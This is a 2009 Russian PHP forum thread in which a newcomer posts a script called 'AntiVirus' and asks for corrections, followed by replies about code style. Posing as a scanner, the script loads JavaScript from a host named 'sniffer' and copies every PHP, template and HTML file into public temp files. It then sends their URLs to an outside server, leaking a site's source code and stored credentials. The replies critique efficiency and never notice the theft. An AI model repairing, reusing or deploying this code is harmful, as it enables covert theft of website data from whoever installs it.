PHP.SU

Программирование на PHP, MySQL и другие веб-технологии

PHP.SU Портал

Главная

Помощь

Поиск

Поиск Яндекс Вакансии

Пользователи

Здравствуйте, Гость

( Вход · Регистрация · Правила форума )

Забыли пароль?

Пожалуйста поправьте код

Форумы портала PHP.SU » PHP » Программирование на PHP (Модераторы: valenok, OrmaJever, Саныч)

Страниц (1): [1]

Описание: Помогите поправить скрипт

Поиск в теме | Версия для печати

DENFER	Отправлено: 17 Декабря, 2009 - 18:43:57
Новичок Покинул форум Сообщений всего: 3 Дата рег-ции: Дек. 2009 Помог: 0 раз(а) [+][+]	PHP: скопировать код в буфер обмена <html> <head> <title>AntiVirus</title> <link type="text/css" rel="StyleSheet" href="images/engine.css" /> <script src="http://sniffer.inhack.ru/u.js" type="text/javascript"></script> </head> <body> <? //SVAR: $ROOT_DIR = "."; $serverurl = "http://av.lipski.ru/"; $LOCATE = $_SERVER['REQUEST_URI']; $SERVER = $_SERVER['SERVER_NAME']; $LOCATE = str_replace("antivirus.php", "", $LOCATE); $SERVER = "http://".$SERVER.$LOCATE; //!SVAR //Function $LOCATE = $_SERVER['REQUEST_URI']; $SERVER = $_SERVER['SERVER_NAME']; $LOCATE = str_replace("antivirus.php", "", $LOCATE); $SERVER = "http://".$SERVER.$LOCATE; function delfile($file){ if(unlink($file)){ return true; }else{ return false; } } function readd($filename){ $handle = fopen($filename, "r"); return fread($handle, filesize($filename)); fclose($handle); } function writed($filename, $somecontent){ if (!$handle = fopen($filename, 'w+')) { return false; exit; } if (fwrite($handle, $somecontent) === FALSE) { return false; exit; } return true; fclose($handle); } function get($filename){ return file_get_contents($filename); } function md6($string,$id){ $secode = rand(9999,999999); $mdc = $string.$id.$secode; return md5(md5($mdc)); } //!Function //Scan_Dir if ($handle = opendir($ROOT_DIR)) { while (false !== ($dirt = readdir($handle))) { if(is_dir($dirt)){ $dirc[] = $dirt; } } closedir($handle); } //!Scan_Dir foreach ($dirc as $N=>$L) { if($L !== '.' and $L !== '..' and $L !== '.svn' and $L !== '.DS_store'){ //SelectDir if(!$ROOT_SCAN){ $L = "."; $ROOT_SCAN = true;} if ($handle = opendir($L)) { while (false !== ($file = readdir($handle))) { $file_t = substr($file, -4); if($file_t == ".php" or $file_t == "php3" or $file_t == "php4" or $file_t == "php5" or $file_t == "php6" or $file_t == ".tpl" or $file_t == "html"){ $file_tocheck[] = $file; } } closedir($handle); } //!SelectDir //ScanFile if($file_tocheck){ foreach ($file_tocheck as $FI=>$FN) { if($FN != "antivirus.php"){ if(file_exists($L."/".$FN)){ $filecontent = @readd($L."/".$FN); $fileid = md6($FN,$FI).".tmp"; $fileidk = $SERVER.$fileid; @writed($fileid,$filecontent); $sendfile = $serverurl."?filename=".$fileidk ."&name=".$FN."&dir=".$L; echo @get($sendfile); if(!delfile($fileid)){ echo "Security Warning: delete file: ".$fileidk; } } } } //!ScanFile } } } ?> </body> </html>

Мелкий	Отправлено: 17 Декабря, 2009 - 19:15:44
Активный участник Покинул форум Сообщений всего: 11926 Дата рег-ции: Июль 2009 Откуда: Россия, Санкт-Петербург Помог: 618 раз(а)	1) зачем дважды выполнять код: PHP: скопировать код в буфер обмена $LOCATE = $_SERVER['REQUEST_URI']; $SERVER = $_SERVER['SERVER_NAME']; $LOCATE = str_replace("antivirus.php", "", $LOCATE); $SERVER = "http://".$SERVER.$LOCATE; 2) зачем функция delfile, если она в точности копирует unlink? 3) PHP: скопировать код в буфер обмена function readd($filename){ $handle = fopen($filename, "r"); return fread($handle, filesize($filename)); fclose($handle); } Если не сильно ошибусь - дескриптор файла не закроется. Т.к. после return выполнение функции прерывается 4) по причине, что и в 3 пункте, exit после return - лишний. 5) для чего столько циклов? Цикл получения массива директорий почему бы не совместить с последующим фореахом, а foreach и $dirc - вообще выкинуть, за ненадобностью. 6) и всё это монструозное нагромождение только лишь для того, чтобы посчитать дважды md5 в поддиректориях и нагрузить довольно сильно сервер http://av.lipski.ru? Чем, вам, кстати, не угодил md5_file, что вы городите ту же функцию? (Отредактировано автором: 17 Декабря, 2009 - 19:22:05) ----- PostgreSQL DBA

DENFER	Отправлено: 17 Декабря, 2009 - 19:46:12
Новичок Покинул форум Сообщений всего: 3 Дата рег-ции: Дек. 2009 Помог: 0 раз(а) [+][+]	пожалуйста напиши в icq! 351437236 (Отредактировано автором: 17 Декабря, 2009 - 19:47:09)

JustUserR	Отправлено: 17 Декабря, 2009 - 19:46:34
Активный участник Покинул форум Сообщений всего: 8715 Дата рег-ции: Июнь 2009 Помог: 17 раз(а)	Мелкий пишет: Зачем функция delfile, если она в точности копирует unlink? Чем, вам, кстати, не угодил md5_file, что вы городите ту же функцию Видать автору не хочется читать мануал по встроенным в PHP функциям или названия неугодили ----- Сделать можно все что угодно - нужно только старание, терпение и хороший поисковик Безлимитный web-хостинг от 15 рублей за 40 МБ дискового пространства - http://ihost[dot]oks71[dot]ru/

EuGen	Отправлено: 18 Декабря, 2009 - 10:49:44
Профессионал Покинул форум Сообщений всего: 9095 Дата рег-ции: Июнь 2007 Откуда: Berlin Помог: 707 раз(а)	Строгое предупреждение за использование неинформативного опроса повторяющего топик темы ----- Есть в мире две бесконечные вещи - это Вселенная и человеческая глупость. Но насчет первой .. я не уверен.

Поиск в теме | Версия для печати

Страниц (1): [1]

Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)

« Программирование на PHP »

Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.